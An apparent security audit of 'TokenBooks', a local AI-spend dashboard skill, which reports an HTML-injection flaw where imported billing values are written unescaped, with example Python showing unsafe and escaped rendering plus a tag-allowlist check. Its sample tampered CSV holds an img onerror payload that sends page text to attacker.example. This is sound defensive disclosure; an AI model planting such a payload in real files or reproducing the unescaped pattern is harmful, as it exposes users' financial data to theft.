TokenBooks Cross-Provider AI Spend Dashboard
Review
Audited by ClawScan on May 10, 2026.
Overview
TokenBooks appears to be a local, offline AI-spend analyzer, but its generated HTML dashboard embeds imported values without escaping, so a malicious or tampered billing file could run script when opened.
This skill does not show evidence of network calls or credential use, and its core purpose is coherent. Before installing, be aware that imported billing data and generated reports are sensitive, and avoid opening dashboards generated from untrusted or edited CSV/JSON files unless the HTML escaping issue is fixed.
Findings (2)
Artifact-based informational review of SKILL.md, metadata, install specs, static scan signals, and capability signals. ClawScan does not execute the skill or run runtime probes.
If you generate a dashboard from a malicious or tampered billing file and open it in a browser, injected script could read or transmit the spend data shown in that page.
The dashboard generator embeds imported provider/model values directly into HTML. No html.escape or equivalent sanitization is shown, so crafted CSV/JSON values could become active markup or script in dashboard.html.
<span><strong>{provider}</strong></span> ... <span><strong>{model}</strong></span>
Only generate dashboards from trusted billing exports, avoid opening or sharing dashboards made from untrusted custom CSV/JSON, and update the code to HTML-escape all user/imported strings before writing the report.
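The following is an added example written for this review, not code from the TokenBooks skill. It reproduces the interpolation pattern quoted above beside the escaped form the recommendation asks for, and adds a small allowlist check that can be run over a generated dashboard.html to spot injected tags. The CSV is constructed for the example, and load_rows, render_row_unsafe, render_row_safe and unexpected_tags are hypothetical stand-ins for the import and report steps, not functions of token_import.py or token_report.py.

```python
import csv
import html
import io
from html.parser import HTMLParser

# Constructed sample of a tampered billing export (not a real provider file).
# The "model" cell of the first row carries an <img onerror> payload that would
# send the rendered page text to an attacker. CSV doubles the inner double quotes.
TAMPERED_CSV = (
    "provider,model,cost_usd\n"
    'openai,"gpt-4o<img src=x onerror=""fetch(\'https://attacker.example/?d=\''
    '+encodeURIComponent(document.body.innerText))"">",12.50\n'
    "anthropic,claude-3,7.25\n"
)


def load_rows(csv_text):
    """Hypothetical stand-in for the import step: parse a billing CSV into row dicts."""
    return list(csv.DictReader(io.StringIO(csv_text)))


def render_row_unsafe(row):
    """The pattern the finding describes: imported values interpolated as-is."""
    return (
        f"<span><strong>{row['provider']}</strong></span> "
        f"<span><strong>{row['model']}</strong></span> "
        f"<span>${row['cost_usd']}</span>"
    )


def render_row_safe(row):
    """Hardened form: every imported string is HTML-escaped, quotes included,
    so the same value is inert both as element text and inside a quoted attribute."""
    def esc(value):
        return html.escape(str(value), quote=True)
    return (
        f"<span><strong>{esc(row['provider'])}</strong></span> "
        f"<span><strong>{esc(row['model'])}</strong></span> "
        f"<span>${esc(row['cost_usd'])}</span>"
    )


class _TagCollector(HTMLParser):
    """Records every start tag with its attributes, the way a browser would tokenize it."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def start_tags(fragment):
    parser = _TagCollector()
    parser.feed(fragment)
    parser.close()
    return parser.tags


# Tags the row template is expected to emit; anything else found in an existing
# dashboard.html is markup that came from a data value rather than the template.
TEMPLATE_TAGS = frozenset({"span", "strong"})


def unexpected_tags(fragment, allowed=TEMPLATE_TAGS):
    """Quick audit of generated HTML: return (tag, attrs) pairs outside the allowlist."""
    return [(tag, attrs) for tag, attrs in start_tags(fragment) if tag not in allowed]


if __name__ == "__main__":
    for row in load_rows(TAMPERED_CSV):
        print("unsafe:", unexpected_tags(render_row_unsafe(row)))
        print("safe  :", unexpected_tags(render_row_safe(row)))
```

For the tampered row the unsafe renderer yields an img tag whose onerror attribute is the fetch payload, while the escaped renderer yields only span and strong tags and the payload appears as visible text. html.escape(quote=True) covers element text and quoted attribute values, which is all the quoted template uses; if a later version of the template ever places imported values inside a script block, an inline event handler or a URL, escaping alone is not sufficient and those contexts need their own encoding or the value should be dropped.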
Local JSON and HTML outputs may reveal provider usage, model usage, costs, and task labels to anyone who can access or receive those files.
The skill intentionally stores imported billing records and generated spend summaries in local files. This is purpose-aligned, but those files can persist beyond the session and may be shared or reused.
python3 token_import.py openai_billing.csv --provider openai --output data.json ... python3 token_report.py data.json --output dashboard.html
Treat generated data.json and dashboard.html files as sensitive financial/usage records; store, share, and delete them accordingly.
